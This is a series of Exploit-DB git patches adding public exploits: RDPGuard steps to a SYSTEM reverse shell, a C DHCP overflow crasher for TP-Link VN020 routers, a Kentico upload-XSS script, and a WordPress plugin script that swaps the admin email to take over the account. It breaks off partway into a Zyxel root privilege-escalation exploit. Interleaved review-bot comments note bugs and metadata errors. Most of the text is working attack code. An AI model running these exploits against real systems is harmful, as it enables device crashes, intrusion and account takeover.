From e49e8d0522fcb8aa215242bc505f75eff62d3b15 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Wed, 14 May 2025 00:16:22 +0000 Subject: [PATCH 1/6] DB: 2025-05-14 5 changes to exploits/shellcodes/ghdb RDPGuard 9.9.9 - Privilege Escalation TP-Link VN020 F3v(T) TT_V6.2.1021) - DHCP Stack Buffer Overflow Kentico Xperience 13.0.178 - Cross Site Scripting (XSS) WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation --- exploits/multiple/local/52289.txt | 20 ++ exploits/multiple/local/52292.c | 338 +++++++++++++++++++++++++++++ exploits/multiple/webapps/52290.py | 68 ++++++ exploits/multiple/webapps/52291.py | 71 ++++++ files_exploits.csv | 4 + 5 files changed, 501 insertions(+) create mode 100644 exploits/multiple/local/52289.txt create mode 100644 exploits/multiple/local/52292.c create mode 100755 exploits/multiple/webapps/52290.py create mode 100755 exploits/multiple/webapps/52291.py diff --git a/exploits/multiple/local/52289.txt b/exploits/multiple/local/52289.txt new file mode 100644 index 000000000..3223f7121 --- /dev/null +++ b/exploits/multiple/local/52289.txt @@ -0,0 +1,20 @@ +# Exploit Title: RDPGuard 9.9.9 - Privilege Escalation +# Discovered by: Ahmet Ümit BAYRAM +# Discovered Date: 09.05.2025 +# Vendor Homepage: https://rdpguard.com +# Software Link: https://rdpguard.com/download.aspx +# Tested Version: 9.9.9 (latest) +# Tested on: Windows 10 (32bit) + +# # # Steps to Reproduce # # # + +# 1. Prepare a .bat file containing your reverse shell code. +# 2. Open RDPGuard. +# 3. Navigate to Tools > Custom Actions / Notifications. +# 4. Click the "Add" button. +# 5. Leave "Event" as "IP Blocked". +# 6. Select "Execute Program" from the "Action" dropdown. +# 7. Under the "Program/script" field, select your prepared .bat file. +# 8. Set up your listener. +# 9. Click "Test Run". +# 10. A reverse shell as NT AUTHORITY\SYSTEM is obtained! \ No newline at end of file 
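Review bot: The advisory never states which Windows account level is needed to reach Tools > Custom Actions / Notifications, and that is what decides whether the ten steps describe a privilege escalation or an administrator-only feature used as designed; the index row likewise records no vendor response or fixed version. A line such as `# Privileges required: <standard user or administrator - to be confirmed>` and a `# Vendor status: <placeholder>` entry in the header would let a reader judge the risk without reproducing the steps. It would also help to say whether "Execute Program" running as NT AUTHORITY\SYSTEM is the service's documented behaviour, since that is the crux of the claimed escalation.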
diff --git a/exploits/multiple/local/52292.c b/exploits/multiple/local/52292.c
new file mode 100644
index 000000000..9bd0139c1
--- /dev/null
+++ b/exploits/multiple/local/52292.c
@@ -0,0 +1,338 @@ +/* + * Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021) - DHCP Stack Buffer Overflow + * Date: 10/20/2024 + * Exploit Author: Mohamed Maatallah + * Vendor Homepage: https://www.tp-link.com + * Version: TT_V6.2.1021 (VN020-F3v(T)) + * Tested on: VN020-F3v(T) Router (Hardware Version 1.0) + * CVE: CVE-2024-11237 + * Category: Remote + + * Technical Details: + * ----------------- + * - Triggers multiple memory corruption vectors in DHCP parsing + * - Primary vector: Stack overflow via oversized hostname (127 bytes) + * - Secondary vector: Parser confusion via malformed length fields + * - Tertiary vector: Vendor specific option parsing edge case + * + * Attack Surface: + * -------------- + * - DHCP service running on port 67 + * - Processes broadcast DISCOVER packets + * - No authentication required + * - Affects all routers running VN020 F3v(t) specifically the ones + * supplied by Tunisie Telecom & Topnet + * + * Exploitation Method: + * ------------------ + * 1. Sends crafted DHCP DISCOVER packet + * 2. Overflows hostname buffer (64 -> 127 bytes) + * 3. Corrupts length fields in DHCP options + * 4. Success = No response (service crash) + * + * Build: + * ------ + * Windows: cl poc.c /o tplink_dhcp.exe or use visual studio directly. 
+ * + * Usage: + * ------ + * tplink_dhcp.exe + +#define _WINSOCK_DEPRECATED_NO_WARNINGS +#include +#include +#include +#include +#include +#include + +#pragma comment(lib, "ws2_32.lib") + +// Standard DHCP ports - Server listens on 67, clients send from 68 +#define DHCP_SERVER_PORT 67 +#define DHCP_CLIENT_PORT 68 +#define MAX_PACKET_SIZE 1024 // Maximum size for DHCP packet +#define MAX_ATTEMPTS 3 + +// Forward declarations of functions +void create_dhcp_discover_packet(unsigned char* packet, int* packet_length); +void add_option(unsigned char* packet, int* offset, unsigned char option, + unsigned char length, unsigned char* data); +void tp_link(unsigned char* packet, int* offset); +void print_packet_hex(unsigned char* packet, int length); +int wait_for_response(SOCKET sock, int timeout); + +int main() { + WSADATA wsa; + SOCKET sock; + struct sockaddr_in dest; + unsigned char packet[MAX_PACKET_SIZE]; // Buffer for DHCP packet + int packet_length = 0; // Length of constructed packet + int attempts = 0; // Counter for send attempts + int success = 0; + + + printf("[TP-Thumper] Initializing Winsock...\n"); + if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) { + printf("[TP-Thumper] Winsock initialization failed. Error: %d\n", + WSAGetLastError()); + return 1; + } + + sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); + if (sock == INVALID_SOCKET) { + printf("[TP-Thumper] Could not create socket. 
Error: %d\n", + WSAGetLastError()); + WSACleanup(); + return 1; + } + + // Set up broadcast address (255.255.255.255) + dest.sin_family = AF_INET; + dest.sin_port = htons(DHCP_SERVER_PORT); + dest.sin_addr.s_addr = inet_addr("255.255.255.255"); + + // Enable broadcast mode on socket + BOOL broadcast = TRUE; + if (setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char*)&broadcast, + sizeof(broadcast)) < 0) { + printf("[TP-Thumper] Broadcast mode failed.\n"); + closesocket(sock); + WSACleanup(); + return 1; + } + + srand((unsigned int)time(NULL)); + + // Create the DHCP DISCOVER packet + create_dhcp_discover_packet(packet, &packet_length); + + // Main attempt loop - tries to send packet MAX_ATTEMPTS times + while (attempts < MAX_ATTEMPTS && !success) { + printf("[TP-Thumper] Sending DHCP Discover packet (Attempt %d/%d)...\n", + attempts + 1, MAX_ATTEMPTS); + print_packet_hex(packet, packet_length); //debug + + // Send the packet + if (sendto(sock, (char*)packet, packet_length, 0, (struct sockaddr*)&dest, + sizeof(dest)) < 0) { + printf("[TP-Thumper] Packet send failed. Error: %d\n", WSAGetLastError()); + } + else { + printf("[TP-Thumper] Packet sent. Waiting for router response...\n"); + if (wait_for_response(sock, 10)) { + printf( + "[TP-Thumper] Router responded! 
Exploit may not have succeeded.\n"); + success = 1; + } + else { + printf("[TP-Thumper] No response received within timeout.\n"); + } + } + attempts++; + } + if (!success) { + printf( + "[TP-Thumper] Exploit succeeded: No router response after %d " + "attempts.\n", + MAX_ATTEMPTS); + } + else { + printf("[TP-Thumper] Exploit failed: Router responded within timeout.\n"); + } + + // Cleanup + closesocket(sock); + WSACleanup(); + return 0; +} +/* + * DHCP Message Format: + * [0x00]: op = 0x01 ; BOOTREQUEST + * [0x01]: htype = 0x01 ; Ethernet + * [0x02]: hlen = 0x06 ; MAC addr len + * [0x03]: hops = 0x00 ; No relay + * [0x04-0x07]: xid ; Random transaction ID + * [0x08-0x0F]: secs + flags ; Broadcast flags set + * [0x10-0x1F]: ciaddr + yiaddr ; Empty + * [0x20-0x27]: siaddr + giaddr ; Empty + * [0x28-0x2D]: chaddr ; Crafted MAC + */ + +void create_dhcp_discover_packet(unsigned char* packet, int* packet_length) { + memset(packet, 0, MAX_PACKET_SIZE); + int offset = 0; + + // DHCP Header - Standard fields + packet[offset++] = 0x01; // BOOTREQUEST + packet[offset++] = 0x01; // Ethernet + packet[offset++] = 0x06; // MAC len + packet[offset++] = 0x00; // No hops + + // ; XID - rand() used for bypass of response filtering + // ; mov eax, rand() + // ; mov [packet + 4], eax + unsigned int xid = (unsigned int)rand(); + *((unsigned int*)&packet[offset]) = htonl(xid); + offset += 4; + + // ; Flags - Set broadcast bit to force response + // ; mov word [packet + 8], 0x0000 ; secs elapsed + // ; mov word [packet + 10], 0x8000 ; broadcast flag + packet[offset++] = 0x00; + packet[offset++] = 0x00; + packet[offset++] = 0x80; + packet[offset++] = 0x00; + + // Zero IP fields - forces DHCP server parse + memset(&packet[offset], 0, 16); + offset += 16; + + // ; Crafted MAC - DE:AD:BE:EF:00:01 + // ; Used for unique client tracking, bypasses MAC filters + packet[offset++] = 0xDE; + packet[offset++] = 0xAD; + packet[offset++] = 0xBE; + packet[offset++] = 0xEF; + packet[offset++] = 0x00; + 
packet[offset++] = 0x01; + memset(&packet[offset], 0x00, 10); + offset += 10; + + // ; Skip server name/boot filename + // ; Total padding: 192 bytes + memset(&packet[offset], 0x00, 64); + offset += 64; + memset(&packet[offset], 0x00, 128); + offset += 128; + + // ; DHCP Magic Cookie + // ; 0x63825363 = DHCP in natural order + packet[offset++] = 0x63; + packet[offset++] = 0x82; + packet[offset++] = 0x53; + packet[offset++] = 0x63; + + // ; Stack layout after this point: + // ; [ebp+0] = DHCP header + // ; [ebp+240] = DHCP options start + // ; Router parses sequentially from this point + add_option(packet, &offset, 0x35, 0x01, (unsigned char[]) { 0x01 }); + add_option(packet, &offset, 0x37, 4, + (unsigned char[]) { + 0x01, 0x03, 0x06, 0x0F + }); + + // ; Trigger overflow conditions + tp_link(packet, &offset); + + packet[offset++] = 0xFF; // End option + *packet_length = offset; +} + +void tp_link(unsigned char* packet, int* offset) { + // ; Vendor specific overflow - triggers parser state confusion + // ; 0x00,0x14,0x22 = TP-Link vendor prefix + // ; Following 0xFF bytes cause length validation bypass + unsigned char vendor_specific[] = { 0x00, 0x14, 0x22, 0xFF, 0xFF, 0xFF }; + add_option(packet, offset, 0x2B, sizeof(vendor_specific), vendor_specific); + + // ; Stack buffer overflow via hostname + // ; Router allocates 64-byte buffer but we send 127 + // ; Overwrites adjacent stack frame + unsigned char long_hostname[128]; + memset(long_hostname, 'A', sizeof(long_hostname) - 1); + long_hostname[127] = '\0'; + add_option(packet, offset, 0x0C, 127, long_hostname); + + // ; Length field exploit + // ; Claims 255 bytes but only sends 1 + // ; Router assumes full length during memory operations + // ; leads to read/write past buffer + add_option(packet, offset, 0x3D, 0xFF, (unsigned char[]) { 0x01 }); +} + +// ; Helper for DHCP option construction +// ; option = option code +// ; length = claimed length (can be falsified) +// ; data = actual payload + +void 
add_option(unsigned char* packet, int* offset, unsigned char option, + unsigned char length, unsigned char* data) { + packet[(*offset)++] = option; // Option type + packet[(*offset)++] = length; // Claimed length + memcpy(&packet[*offset], data, length); + *offset += length; +} + +// Debug +void print_packet_hex(unsigned char* packet, int length) { + printf("[TP-Thumper] Packet Hex Dump:\n"); + + // Print header fields with labels + printf("Opcode (op): %02X\n", packet[0]); + printf("Hardware Type (htype): %02X\n", packet[1]); + printf("Hardware Address Length (hlen): %02X\n", packet[2]); + printf("Hops: %02X\n", packet[3]); + + // Transaction ID + printf("Transaction ID (xid): "); + for (int i = 4; i < 8; i++) { + printf("%02X ", packet[i]); + } + printf("\n"); + + // Flags + printf("Flags: "); + for (int i = 10; i < 12; i++) { + printf("%02X ", packet[i]); + } + printf("\n"); + + // Client Hardware Address (MAC) + printf("Client Hardware Address (chaddr): "); + for (int i = 28; i < 34; i++) { + printf("%02X ", packet[i]); + } + printf("\n"); + + // DHCP Magic Cookie + printf("Magic Cookie: "); + for (int i = 236; i < 240; i++) { + printf("%02X ", packet[i]); + } + printf("\n"); + + // DHCP Options + printf("DHCP Options:\n"); + int i = 240; + while (i < length) { + printf(" Option: %02X, Length: %02X, Data: ", packet[i], packet[i + 1]); + int option_length = packet[i + 1]; + for (int j = 0; j < option_length; j++) { + printf("%02X ", packet[i + 2 + j]); + } + printf("\n"); + i += 2 + option_length; + if (packet[i] == 0xFF) { + printf(" End of Options\n"); + break; + } + } +} + +// Wait for router response with timeout +int wait_for_response(SOCKET sock, int timeout) { + struct timeval tv; + tv.tv_sec = timeout; + tv.tv_usec = 0; + + // Set up file descriptor set for select() + fd_set readfds; + FD_ZERO(&readfds); + FD_SET(sock, &readfds); + + // Wait for data or timeout + int result = select(0, &readfds, NULL, NULL, &tv); + return result > 0; // Returns true if 
data available
+}
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52290.py b/exploits/multiple/webapps/52290.py
new file mode 100755
index 000000000..81fea1eb5
--- /dev/null
+++ b/exploits/multiple/webapps/52290.py
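Review bot: The header block classifies this entry as `Category: Remote`, while the file is placed under exploits/multiple/local/ and the index row tags it `local`; the described surface is the DHCP service on UDP 67 reached by broadcast, so the `local` placement looks like the wrong side and the two should be reconciled (the title `TP-Link VN020 F3v(T) TT_V6.2.1021)` also carries an unbalanced `)` that is repeated in the commit subject and the CSV row). In tp_link, the final add_option call passes a claimed length of 0xFF together with a one-element compound literal, so add_option's memcpy reads 254 bytes past that literal on the PoC's own stack — undefined behaviour in the tool itself — and the comment "Claims 255 bytes but only sends 1" is inaccurate because 255 bytes are in fact copied into the packet. At minimum the comment should describe what the code does, e.g. `// NOTE: memcpy copies the full claimed length; the 1-byte literal is over-read (UB)`.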
@@ -0,0 +1,68 @@ +# Exploit Title: Kentico Xperience 13.0.178 - Cross Site Scripting (XSS) +# Date: 2025-05-09 +# Version: Kentico Xperience before 13.0.178 +# Exploit Author: Alex Messham +# Contact: ramessham@gmail.com +# Source: https://github.com/xirtam2669/Kentico-Xperience-before-13.0.178---XSS-POC/ +# CVE: CVE-2025-32370 + +import requests +import subprocess +import os +import argparse + +def create_svg_payload(svg_filename: str): + print(f"[*] Writing malicious SVG to: {svg_filename}") + svg_payload = ''' + + + + + +''' + with open(svg_filename, 'w') as f: + f.write(svg_payload) + +def zip_payload(svg_filename: str, zip_filename: str): + print(f"[*] Creating zip archive: {zip_filename}") + subprocess.run(['zip', zip_filename, svg_filename], check=True) + +def upload_zip(zip_filename: str, target_url: str): + full_url = f"{target_url}?Filename={zip_filename}&Complete=false" + headers = { + "Content-Type": "application/octet-stream" + } + + print(f"[+] Uploading {zip_filename} to {full_url}") + with open(zip_filename, 'rb') as f: + response = requests.post(full_url, headers=headers, data=f, +verify=False) + + if response.status_code == 200: + print("[+] Upload succeeded") + else: + print(f"[-] Upload failed with status code {response.status_code}") + print(response.text) + + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description="PoC for CVE-2025-2748 - +Unauthenticated ZIP file upload with embedded SVG for XSS.") + parser.add_argument("--url", required=True, help="Target upload URL +(e.g. https://example.com/CMSModules/.../MultiFileUploader.ashx)") + parser.add_argument("--svg", default="poc.svc", help="SVG filename to +embed inside the zip") + parser.add_argument("--zip", default="exploit.zip", help="Name of the +output zip file") + + args = parser.parse_args() + + create_svg_payload(args.svg) + zip_payload(args.svg, args.zip) + upload_zip(args.zip, args.url) +``` \ No newline at end of file 
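Review bot: The argparse description in the `__main__` block names `CVE-2025-2748`, while the file header and the index row give `CVE-2025-32370`; it should read `description="PoC for CVE-2025-32370 - Unauthenticated ZIP file upload with embedded SVG for XSS."` so the two identifiers agree. The file's last line is a bare markdown fence (three backticks) left over from wherever the script was pasted from, which makes the file a syntax error as committed. The `--svg` default `poc.svc` also looks like a typo for an .svg name given the help text "SVG filename", though I cannot tell from here whether the extension matters to the tool.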
diff --git a/exploits/multiple/webapps/52291.py b/exploits/multiple/webapps/52291.py
new file mode 100755
index 000000000..8d9408c5c
--- /dev/null
+++ b/exploits/multiple/webapps/52291.py
@@ -0,0 +1,71 @@ +# Exploit Title: WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation +# Google Dork: inurl:/wp-content/plugins/frontend-login-and-registration-blocks/ +# Date: 2025-05-12 +# Exploit Author: Md Shoriful Islam (RootHarpy) +# Vendor Homepage: https://wordpress.org/plugins/frontend-login-and-registration-blocks/ +# Software Link: https://downloads.wordpress.org/plugin/frontend-login-and-registration-blocks.1.0.7.zip +# Version: <= 1.0.7 +# Tested on: Ubuntu 22.04 + WordPress 6.5.2 +# CVE : CVE-2025-3605 + +import requests +import argparse +import sys + +def display_banner(): + banner = """ + _____ _____ ___ __ ___ ___ ____ __ __ ___ + / __\ \ / / __|_|_ ) \_ ) __|__|__ / / / / \| __| +| (__ \ V /| _|___/ / () / /|__ \___|_ \/ _ \ () |__ \ + \___| \_/ |___| /___\__/___|___/ |___/\___/\__/|___/ + """ + print(banner) + +def suppress_ssl_warnings(): + requests.packages.urllib3.disable_warnings() + +def initialize_session(): + new_session = requests.Session() + new_session.verify = False + new_session.headers.update({'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"}) + return new_session + +def parse_input_args(): + parser = argparse.ArgumentParser(description="Exploit for Privilege Escalation in Frontend Login and Registration Plugin <= 1.0.7") + parser.add_argument("--target", "-t", required=True, help="Target URL to exploit") + parser.add_argument("--target_user", "-u", default="1", help="User ID for target (default: 1)") + parser.add_argument("--new_email", "-e", default="example@gmail.com", help="Email to change to (default: example@gmail.com)") + return parser.parse_args() + +def generate_payload(user, email): + return { + 'action': 'flrblocksusersettingsupdatehandle', + 'user_id': user, + 'flr-blocks-email-update': email + } + +def execute_exploit(session, target_url, payload): + try: + return 
session.post(f"{target_url}/wp-admin/admin-ajax.php", data=payload)
+ except Exception as error:
+ print(f"Request error: {error}")
+ sys.exit(1)
+
+def process_response(response):
+ if response.status_code == 200 and response.text.strip() != "0":
+ print(f"Exploit succeeded! Response: {response.text}")
+ print("Next: Go to the Forgot Password page and reset the admin password using the new email!")
+ else:
+ print(f"Exploit failed. HTTP Status: {response.status_code}, Response: {response.text}")
+
+def run_exploit():
+ display_banner()
+ suppress_ssl_warnings()
+ args = parse_input_args()
+ session = initialize_session()
+ payload = generate_payload(args.target_user, args.new_email)
+ response = execute_exploit(session, args.target, payload)
+ process_response(response)
+
+if __name__ == "__main__":
+ run_exploit()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 845f80054..8b57329d3 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
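Review bot: `execute_exploit` catches a bare `Exception` and calls `sys.exit(1)`, so any programming error raised inside the call (an `AttributeError`, a `TypeError` from the payload dict) is printed as "Request error" and the traceback is lost; narrowing it to `except requests.RequestException as error:` keeps the exit-on-network-failure behaviour while letting real bugs surface. `process_response` also reports success for any HTTP 200 whose body is not "0", which as far as the visible code shows only means the endpoint answered with something other than its default, so the success line overstates what was checked; `print(f"Request accepted (HTTP 200), response: {response.text}")` would be a more honest message.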
@@ -10568,6 +10568,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51983,exploits/multiple/local/51983.txt,"PrusaSlicer 2.6.1 - Arbitrary code execution",2024-04-12,"Kamil Breński",local,multiple,,2024-04-12,2024-04-12,0,,,,,,
 43500,exploits/multiple/local/43500.txt,"Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping",2016-07-03,tintinweb,local,multiple,,2018-01-11,2018-01-11,0,CVE-2016-0772,,,,,https://github.com/tintinweb/pub/tree/11f6ebda59ad878377df78351f8ab580660d0024/pocs/cve-2016-0772
 52190,exploits/multiple/local/52190.py,"qBittorrent 5.0.1 - MITM RCE",2025-04-11,"Jordan Sharp",local,multiple,,2025-04-11,2025-04-11,0,CVE-2024-51774,,,,,
+52289,exploits/multiple/local/52289.txt,"RDPGuard 9.9.9 - Privilege Escalation",2025-05-13,"Ahmet Ümit BAYRAM",local,multiple,,2025-05-13,2025-05-13,0,CVE-n/a,,,,,
 21078,exploits/multiple/local/21078.txt,"Respondus for WebCT 1.1.2 - Weak Password Encryption",2001-08-23,"Desmond Irvine",local,multiple,,2001-08-23,2012-09-05,1,CVE-2001-1003;OSVDB-11802,,,,,https://www.securityfocus.com/bid/3228/info
 47172,exploits/multiple/local/47172.sh,"S-nail < 14.8.16 - Local Privilege Escalation",2019-01-13,bcoles,local,multiple,,2019-07-26,2019-07-26,0,CVE-2017-5899,,,,,https://github.com/bcoles/local-exploits/blob/3c5cd80a7c59ccd29a2c2a1cdbf71e0de8e66c11/CVE-2017-5899/exploit.sh
 49108,exploits/multiple/local/49108.txt,"SAP Lumira 1.31 - Stored Cross-Site Scripting",2020-11-27,"Ilca Lucian Florin",local,multiple,,2020-11-27,2020-11-27,0,,,,,,
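Review bot: The new 52289 row fills the CVE column with the literal `CVE-n/a`, whereas the neighbouring rows that have no identifier (51983, 49108) leave that column empty; a non-empty placeholder will be picked up by any consumer that splits the column on `;` and treats each token as a CVE id. Leaving the field blank, `...,2025-05-13,2025-05-13,0,,,,,,`, matches the file's existing convention. The other three index rows added in this commit carry real identifiers and are consistent with their file headers.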
@@ -10585,6 +10586,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 22732,exploits/multiple/local/22732.java,"Sun JRE/SDK 1.x - Untrusted Applet Java Security Model Violation",2003-06-05,"Marc Schoenefeld",local,multiple,,2003-06-05,2012-11-15,1,CVE-2003-1123;OSVDB-15151,,,,,https://www.securityfocus.com/bid/7824/info
 9973,exploits/multiple/local/9973.sh,"Sun VirtualBox 3.0.6 - Local Privilege Escalation",2009-10-17,prdelka,local,multiple,,2009-10-16,,1,CVE-2009-3692,,,,,
 49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Tess Sluyter",local,multiple,,2020-12-09,2020-12-09,0,,,,,,
+52292,exploits/multiple/local/52292.c,"TP-Link VN020 F3v(T) TT_V6.2.1021) - DHCP Stack Buffer Overflow",2025-05-13,"Mohamed Maatallah",local,multiple,,2025-05-13,2025-05-13,0,CVE-2024-11237,,,,,
 19551,exploits/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (1)",1997-02-13,"Last Stage of Delirium",local,multiple,,1997-02-13,2012-07-03,1,CVE-1999-0041;OSVDB-1109,,,,,https://www.securityfocus.com/bid/711/info
 19552,exploits/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (2)",1997-02-13,"Solar Designer",local,multiple,,1997-02-13,2012-07-03,1,CVE-1999-0041;OSVDB-1109,,,,,https://www.securityfocus.com/bid/711/info
 11789,exploits/multiple/local/11789.c,"VariCAD 2010-2.05 EN - Local Buffer Overflow",2010-03-17,n00b,local,multiple,,2010-03-16,,1,OSVDB-63067,,,,,
@@ -12090,6 +12092,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 24573,exploits/multiple/webapps/24573.txt,"Keene Digital Media Server 1.0.2 - Cross-Site Scripting",2004-09-04,dr_insane,webapps,multiple,,2004-09-04,2013-03-04,1,,,,,,https://www.securityfocus.com/bid/11111/info
 36609,exploits/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",webapps,multiple,80,2015-04-02,2015-04-02,0,CVE-2014-7910;CVE-2014-7227;CVE-2014-7196;CVE-2014-7169;CVE-2014-62771;CVE-2014-6271;CVE-2014-5288;CVE-2014-5287;CVE-2014-3671;OSVDB-120255;CVE-2014-3659;OSVDB-120254;OSVDB-120253;OSVDB-120252;OSVDB-120251;OSVDB-120250;OSVDB-120249;OSVDB-112004,,,,,
 42090,exploits/multiple/webapps/42090.txt,"KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution",2017-05-30,SecuriTeam,webapps,multiple,,2017-05-30,2017-05-30,0,,,,,,
+52290,exploits/multiple/webapps/52290.py,"Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)",2025-05-13,"Alex Messham",webapps,multiple,,2025-05-13,2025-05-13,0,CVE-2025-32370,,,,,
 14629,exploits/multiple/webapps/14629.html,"Kleeja Upload - Cross-Site Request Forgery (Change Admin Password)",2010-08-12,"KOLTN S",webapps,multiple,80,2010-08-12,2010-09-08,0,OSVDB-67094,,,,,
 44487,exploits/multiple/webapps/44487.txt,"Kodi 17.6 - Persistent Cross-Site Scripting",2018-04-18,"Manuel García Cárdenas",webapps,multiple,,2018-04-18,2018-04-18,0,CVE-2018-8831,"Cross-Site Scripting (XSS)",,,,
 50521,exploits/multiple/webapps/50521.py,"KONGA 0.14.9 - Privilege Escalation",2021-11-15,"Fabricio Salomao",webapps,multiple,,2021-11-15,2021-11-15,0,,,,,http://www.exploit-db.comkonga-0.14.9.zip,
@@ -12494,6 +12497,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 52248,exploits/multiple/webapps/52248.txt,"WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection",2025-04-16,"Ivan Spiridonov",webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2024-0399,,,,,
 47690,exploits/multiple/webapps/47690.md,"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts",2019-10-14,"Sebastian Neef",webapps,multiple,,2019-11-19,2019-11-19,0,CVE-2019-17671,,,,,https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
 52285,exploits/multiple/webapps/52285.py,"WordPress Depicter Plugin 3.6.1 - SQL Injection",2025-05-09,"Andrew Long",webapps,multiple,,2025-05-09,2025-05-09,0,CVE-2025-2011,,,,,https://github.com/datagoboom/CVE-2025-2011
+52291,exploits/multiple/webapps/52291.py,"WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation",2025-05-13,"Md Shoriful Islam",webapps,multiple,,2025-05-13,2025-05-13,0,CVE-2025-3605,,,,,
 49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple,,2020-12-04,2020-12-04,0,CVE-2020-28976;CVE-2020-28977;CVE-2020-28978,,,,,
 48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,,2020-10-20,2020-10-20,0,,,,,,
 36930,exploits/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - SQL Injection",2015-05-07,"Felipe Molina",webapps,multiple,,2015-05-07,2015-05-07,0,OSVDB-121843,"WordPress Plugin",,,http://www.exploit-db.comfreshmail-newsletter.1.5.8.zip,
From 8bc45b368af71018b3b9d493d9a42fb3c8eae8f6 Mon Sep 17 00:00:00 2001
From: Exploit-DB Date: Mon, 19 May 2025 00:16:30 +0000 Subject: [PATCH 2/6] DB: 2025-05-19 4 changes to exploits/shellcodes/ghdb Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation CrushFTP 11.3.1 - Authentication Bypass Invision Community 5.0.6 - Remote Code Execution (RCE) --- exploits/multiple/local/52293.bash | 131 +++++++ exploits/multiple/remote/52294.php | 56 +++ exploits/multiple/remote/52295.py | 609 +++++++++++++++++++++++++++++ files_exploits.csv | 3 + 4 files changed, 799 insertions(+) create mode 100644 exploits/multiple/local/52293.bash create mode 100644 exploits/multiple/remote/52294.php create mode 100755 exploits/multiple/remote/52295.py diff --git a/exploits/multiple/local/52293.bash b/exploits/multiple/local/52293.bash new file mode 100644 index 000000000..7539e0c35 --- /dev/null +++ b/exploits/multiple/local/52293.bash 
@@ -0,0 +1,131 @@ +# Exploit Title: Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation +# Date: 2025-04-23 +# Exploit Author: Marco Ivaldi +# Vendor Homepage: https://www.zyxel.com/ +# Version: Zyxel uOS V1.31 (see +https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-= +=3D +advisory-for-incorrect-permission-assignment-and-improper-privilege-managem= +=3D +ent-vulnerabilities-in-usg-flex-h-series-firewalls-04-22-2025) +# Tested on: Zyxel FLEX100H with Firmware V1.31(ABXF.0) and Zyxel +FLEX200H with Firmware V1.31(ABWV.0) +# CVE: CVE-2025-1731 + +#!/bin/sh + +# +# raptor_fermion - Zyxel fermion-wrapper root LPE exploit +# Copyright (c) 2025 Marco Ivaldi +# +# "So we wait, this is our labour... we wait." +# -- Anthony Swofford on fuzzing +# +# The setuid root binary program `/usr/sbin/fermion-wrapper` distributed by +# Zyxel with some of their appliances follows symbolic links in the `/tmp` +# directory when run with the `register-status` argument. This allows local +# users with access to a Linux OS shell to trick the program into creating +# writable files at arbitrary locations in the filesystem. This vulnerability +# can be exploited to overwrite arbitrary files or locally escalate privileges +# from low-privileged user (e.g., `postgres`) to root. +# +# Note: the `/tmp` directory doesn't have the sticky bit set, which simplifies +# exploitation of this vulnerability and may also cause all sorts of havoc. 
+# +# ## Vulnerability information +# +# * CVE ID - CVE-2025-1731 +# * High - 7.8 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H +# * CWE-61 - https://cwe.mitre.org/data/definitions/61.html +# +# ## Relevant links +# +# * https://github.com/hnsecurity/vulns/blob/main/HNS-2025-10-zyxel-fermion.txt +# * https://security.humanativaspa.it/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731 +# * https://0xdeadc0de.xyz/blog/cve-2025-1731_cve-2025-1732 +# * https://security.humanativaspa.it/tag/zyxel/ +# +# ## Usage example +# +# ``` +# $ ./raptor_fermion +# raptor_fermion - Zyxel fermion-wrapper root LPE exploit +# Copyright (c) 2025 Marco Ivaldi +# +# [*] Exploiting /usr/sbin/fermion-wrapper +# $ uname -a +# Linux FLEX100H-HackerHood 4.14.207-10.3.7.0-2 #5 SMP PREEMPT Thu Jan 9 04:34:58 UTC 2025 aarch64 GNU/Linux +# $ id +# uid=502(postgres) gid=502(postgres) groups=502(postgres) +# $ ls -l /usr/sbin/fermion-wrapper +# -rwsr-xr-x 1 root root 44288 Jan 9 05:34 /usr/sbin/fermion-wrapper +# {"status": 0, "registered": 1, "nebula_registered": 1, "bundle": 1} +# +# [+] Everything looks good \o/, wait an hour and check /tmp/pwned +# $ ls -l 